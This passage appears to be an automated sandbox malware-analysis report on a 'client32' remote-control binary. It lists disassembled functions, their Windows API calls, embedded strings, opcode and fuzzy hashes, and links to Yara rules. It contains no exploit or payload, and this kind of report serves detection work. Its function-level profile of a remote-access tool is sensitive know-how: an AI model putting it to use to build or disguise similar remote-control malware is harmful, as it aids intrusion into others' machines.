                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: LongWindow$ErrorLastwsprintf$CreateDialogExitMessageParamProcessVersion_memset
                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                              • API String ID: 3136964118-2830328467
                                                                              • Opcode ID: 990935dc77e2aa569bf3059a9d0286cde9b91335195f1cd60f9fd39a0179e0c2
                                                                              • Instruction ID: a6255a4dd11f96cfd194679b8cc3cdd2b3575d4c8ce1213ed658c40333833496
                                                                              • Opcode Fuzzy Hash: 990935dc77e2aa569bf3059a9d0286cde9b91335195f1cd60f9fd39a0179e0c2
                                                                              • Instruction Fuzzy Hash: 1431E4B5A04615ABCB14DF65DC81F9BB3E5AB8C318F10862DF56A973D0DB34B840CB98
                                                                              Function 110ED7B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 101registryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,?), ref: 110ED801
                                                                              • _free.LIBCMT ref: 110ED81C
                                                                                • Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ABB
                                                                                • Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD
                                                                              • _malloc.LIBCMT ref: 110ED82E
                                                                              • RegQueryValueExA.ADVAPI32(000007FF,?,00000000,?,00000000,000007FF), ref: 110ED85A
                                                                              • _free.LIBCMT ref: 110ED8E3
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: QueryValue_free$ErrorFreeHeapLast_malloc
                                                                              • String ID: Error %d getting %s
                                                                              • API String ID: 582965682-2709163689
                                                                              • Opcode ID: 59ae116487e404f5de4155705fcd48daf632d85a688279f19c106630c28adf20
                                                                              • Instruction ID: 02eced05e3356085969bcbe05084d5abf0c2b7b1903d0388d20c61e7be7eac91
                                                                              • Opcode Fuzzy Hash: 59ae116487e404f5de4155705fcd48daf632d85a688279f19c106630c28adf20
                                                                              • Instruction Fuzzy Hash: F1318375D001289BDB60DA59CD84BEEB7F9EF54314F0481E9E88DA7240DE706E89CBD1
                                                                              Function 1100F990 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 100COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 1100F9A9
                                                                                • Part of subcall function 111612E6: std::exception::exception.LIBCMT ref: 111612FB
                                                                                • Part of subcall function 111612E6: __CxxThrowException@8.LIBCMT ref: 11161310
                                                                                • Part of subcall function 111612E6: std::exception::exception.LIBCMT ref: 11161321
                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 1100F9CA
                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 1100F9E5
                                                                              • _memmove.LIBCMT ref: 1100FA4D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Xinvalid_argumentstd::_$std::exception::exception$Exception@8Throw_memmove
                                                                              • String ID: invalid string position$string too long
                                                                              • API String ID: 443534600-4289949731
                                                                              • Opcode ID: 65343fa5adcae717427247030e2bc263d0e2c2c33e6d52194a4164a92b342909
                                                                              • Instruction ID: dd7b0a9210ae89047594a984bf0db1b74830ff0f253f3c884b4c9459fb9d7564
                                                                              • Opcode Fuzzy Hash: 65343fa5adcae717427247030e2bc263d0e2c2c33e6d52194a4164a92b342909
                                                                              • Instruction Fuzzy Hash: 1031FE72B04205CFE715CE5DE880A5AF7D9EF957A4B10062FE551CB240D771EC80D792
                                                                              Function 1103D0E0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80synchronizationwindowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 111100D0: SetEvent.KERNEL32(00000000,?,1102CB9F), ref: 111100F4
                                                                                • Part of subcall function 11110920: EnterCriticalSection.KERNEL32(00000010,00000000,759223A0,1100BF7B), ref: 11110928
                                                                                • Part of subcall function 11110920: LeaveCriticalSection.KERNEL32(00000010), ref: 11110935
                                                                              • WaitForSingleObject.KERNEL32(?,00001388), ref: 1103D13A
                                                                              • SetPriorityClass.KERNEL32(?,?), ref: 1103D167
                                                                              • IsWindow.USER32(?), ref: 1103D17E
                                                                              • SendMessageA.USER32(?,0000004A,00040414,00000492), ref: 1103D1B8
                                                                              • _free.LIBCMT ref: 1103D1BF
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CriticalSection$ClassEnterEventLeaveMessageObjectPrioritySendSingleWaitWindow_free
                                                                              • String ID: Show16
                                                                              • API String ID: 625148989-2844191965
                                                                              • Opcode ID: 3c8172704bdceca68c72fbf0a9a51fac22612fd7412045f5de257e3282e9e7b5
                                                                              • Instruction ID: 63bdf3f47677d5a3c66ccb25ed14d3d2c42581b640399fe0720dd9fbd5d3b219
                                                                              • Opcode Fuzzy Hash: 3c8172704bdceca68c72fbf0a9a51fac22612fd7412045f5de257e3282e9e7b5
                                                                              • Instruction Fuzzy Hash: 3B3182B5E10346AFD715DFA4C8849AFF7F9BB84309F40496DE56A97244DB70BA00CB81
                                                                              Function 11009620 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 77fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 110D1540: wvsprintfA.USER32(?,?,00000000), ref: 110D1572
                                                                              • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 110096D6
                                                                              • WriteFile.KERNEL32(?,<tr><td ><div align="center"><img src="URL_list.gif" height="78"><br></div> </td></tr><tr><td > <div align="left"> <table border="0" cellpadding="0" height="23" >,000000B9,00000000,00000000), ref: 110096EB
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              • <HTML%s><Body><title>Approved URLs</title><body bgcolor="#FFFFFF"><div align="center"> <center><table > <td><div align="center"> <center><table border="1" cellspacing="0" cellpadding="3" bgcolor="#FFFFFF" bordercolor="#6089B7">, xrefs: 11009659
                                                                              • e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 11009688, 110096B0
                                                                              • <tr><td ><div align="center"><img src="URL_list.gif" height="78"><br></div> </td></tr><tr><td > <div align="left"> <table border="0" cellpadding="0" height="23" >, xrefs: 110096E5
                                                                              • IsA(), xrefs: 1100968D, 110096B5
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: FileWrite$ErrorExitLastMessageProcesswsprintfwvsprintf
                                                                              • String ID: <HTML%s><Body><title>Approved URLs</title><body bgcolor="#FFFFFF"><div align="center"> <center><table > <td><div align="center"> <center><table border="1" cellspacing="0" cellpadding="3" bgcolor="#FFFFFF" bordercolor="#6089B7">$<tr><td ><div align="center"><img src="URL_list.gif" height="78"><br></div> </td></tr><tr><td > <div align="left"> <table border="0" cellpadding="0" height="23" >$IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                              • API String ID: 863766397-389219706
                                                                              • Opcode ID: 6cba4906e97f348ea097e0d93425011368abffb83af317fd01dd9cb46dfc5e94
                                                                              • Instruction ID: c29ccd5437a1998bdc0500c50b26c338a4961a37ea6a19b2fc580a4c00e0eec9
                                                                              • Opcode Fuzzy Hash: 6cba4906e97f348ea097e0d93425011368abffb83af317fd01dd9cb46dfc5e94
                                                                              • Instruction Fuzzy Hash: 5A215E75A00219ABDB00DFD5DC41FEEF3B8FF59654F10025AE922B7280EB746504CBA1
                                                                              Function 110ED020 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 63COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • IsWindow.USER32(0000070B), ref: 110ED02A
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              • LoadCursorA.USER32(00000000,00007F00), ref: 110ED0B1
                                                                              • SetCursor.USER32(00000000), ref: 110ED0B8
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Cursor$ErrorExitLastLoadMessageProcessWindowwsprintf
                                                                              • String ID: ..\CTL32\NSWin32.cpp$IsWindow(hRich)$pEnLink!=0
                                                                              • API String ID: 2735369351-763374134
                                                                              • Opcode ID: c71bab5a9d15cfbc5a16eb7372e080607997f0f4ce03b78e9d73ef1e06305408
                                                                              • Instruction ID: 1517011758136c5ff836e71d92dda8c4c85f8f681a38b9b7789002e2c31f8d4e
                                                                              • Opcode Fuzzy Hash: c71bab5a9d15cfbc5a16eb7372e080607997f0f4ce03b78e9d73ef1e06305408
                                                                              • Instruction Fuzzy Hash: 2F01497AE412253BD511A5537C0AFDFBB1CEF412ADF040031FD1996201F66AB11583E6
                                                                              Function 110056A0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 62windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetClientRect.USER32(00000000,?), ref: 110056DD
                                                                              • BeginPaint.USER32(?,?), ref: 110056E8
                                                                              • BitBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,00CC0020), ref: 1100570A
                                                                              • EndPaint.USER32(?,?), ref: 1100572F
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110056C3
                                                                              • m_hWnd, xrefs: 110056C8
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Paint$BeginClientErrorExitLastMessageProcessRectwsprintf
                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                              • API String ID: 1216912278-2830328467
                                                                              • Opcode ID: 8ad934cf7e7b29b38782cb4c4aa0535e86b672492a30f68ceedf0682d58b908e
                                                                              • Instruction ID: 646bbc1308694ba02cb50681d3c8309cd3c635e6896d205317d73ea189e6e8a3
                                                                              • Opcode Fuzzy Hash: 8ad934cf7e7b29b38782cb4c4aa0535e86b672492a30f68ceedf0682d58b908e
                                                                              • Instruction Fuzzy Hash: FA1194B5A40219BFD714CBA0CD85FBEB3BCEB88709F104569F51796584DBB0A904C764
                                                                              Function 110B94B0 Relevance: 10.6, APIs: 7, Instructions: 58COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetForegroundWindow.USER32(75A77AA0,?,110C032C,110C032C,110C032C,110C032C,110C032C,110C032C,110C032C,110C032C), ref: 110B94C7
                                                                              • GetCursorPos.USER32(110C032C), ref: 110B94D6
                                                                                • Part of subcall function 1115F5B0: GetWindowRect.USER32(?,?), ref: 1115F5CC
                                                                              • PtInRect.USER32(110C032C,110C032C,110C032C), ref: 110B94F4
                                                                              • ClientToScreen.USER32(?,110C032C), ref: 110B9516
                                                                              • SetCursorPos.USER32(110C032C,110C032C,?,110C032C,110C032C,110C032C,110C032C,110C032C,110C032C,110C032C,110C032C), ref: 110B9524
                                                                              • LoadCursorA.USER32(00000000,00007F00), ref: 110B9531
                                                                              • SetCursor.USER32(00000000,?,110C032C,110C032C,110C032C,110C032C,110C032C,110C032C,110C032C,110C032C), ref: 110B9538
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Cursor$RectWindow$ClientForegroundLoadScreen
                                                                              • String ID:
                                                                              • API String ID: 3235510773-0
                                                                              • Opcode ID: 8d2b5613eb67d591a4703b81c38f404f3807f5f87d52da527a803e22d8ab7870
                                                                              • Instruction ID: e413c7048e2c9fc99527a8bfd6ed1c185ebac442807b3b09d80bd78fd45dd6ba
                                                                              • Opcode Fuzzy Hash: 8d2b5613eb67d591a4703b81c38f404f3807f5f87d52da527a803e22d8ab7870
                                                                              • Instruction Fuzzy Hash: A8115B72A4020E9BDB18DFA4C984DAFF7BCFB48215B004569E52297644DB34E906CBA4
                                                                              Function 11139960 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 56COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • InterlockedDecrement.KERNEL32(111F1BC0), ref: 111399AD
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              • De-Inited VolumeControl Subsystem (OK: 0 ref's)..., xrefs: 11139A10
                                                                              • UI.CPP, xrefs: 111399BD
                                                                              • "Unpaired VolumeControlInstanceRelease() call" && (-1 != new_value), xrefs: 111399C2
                                                                              • De-Initing VolumeControl Subsystem..., xrefs: 11139994
                                                                              • De-Inited VolumeControl Subsystem (Ref's Outstanding!)..., xrefs: 111399CF
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: DecrementErrorExitInterlockedLastMessageProcesswsprintf
                                                                              • String ID: "Unpaired VolumeControlInstanceRelease() call" && (-1 != new_value)$De-Inited VolumeControl Subsystem (OK: 0 ref's)...$De-Inited VolumeControl Subsystem (Ref's Outstanding!)...$De-Initing VolumeControl Subsystem...$UI.CPP
                                                                              • API String ID: 1808733558-973815363
                                                                              • Opcode ID: 5f7036c21c148ea7cf9c645d1c387948bc2d884219579e1534bdf6d07b7a67db
                                                                              • Instruction ID: d06095d957dcd957f3f08007483117ab829c543eb00cd4bea9fc0d92cb8d829e
                                                                              • Opcode Fuzzy Hash: 5f7036c21c148ea7cf9c645d1c387948bc2d884219579e1534bdf6d07b7a67db
                                                                              • Instruction Fuzzy Hash: 74014979E0955EF7CA00ABF59D41F8AF769DB4163DF100A26E829D2A80FB3561004795
                                                                              Function 1100B340 Relevance: 10.6, APIs: 7, Instructions: 54COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • InterlockedDecrement.KERNEL32(?), ref: 1100B350
                                                                              • EnterCriticalSection.KERNEL32(?,?,1100BF9B,?,00000000,00000002), ref: 1100B389
                                                                              • EnterCriticalSection.KERNEL32(?,?,1100BF9B,?,00000000,00000002), ref: 1100B3A8
                                                                                • Part of subcall function 1100A250: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?), ref: 1100A26E
                                                                                • Part of subcall function 1100A250: DeviceIoControl.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?), ref: 1100A298
                                                                                • Part of subcall function 1100A250: GetLastError.KERNEL32 ref: 1100A2A0
                                                                                • Part of subcall function 1100A250: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 1100A2B4
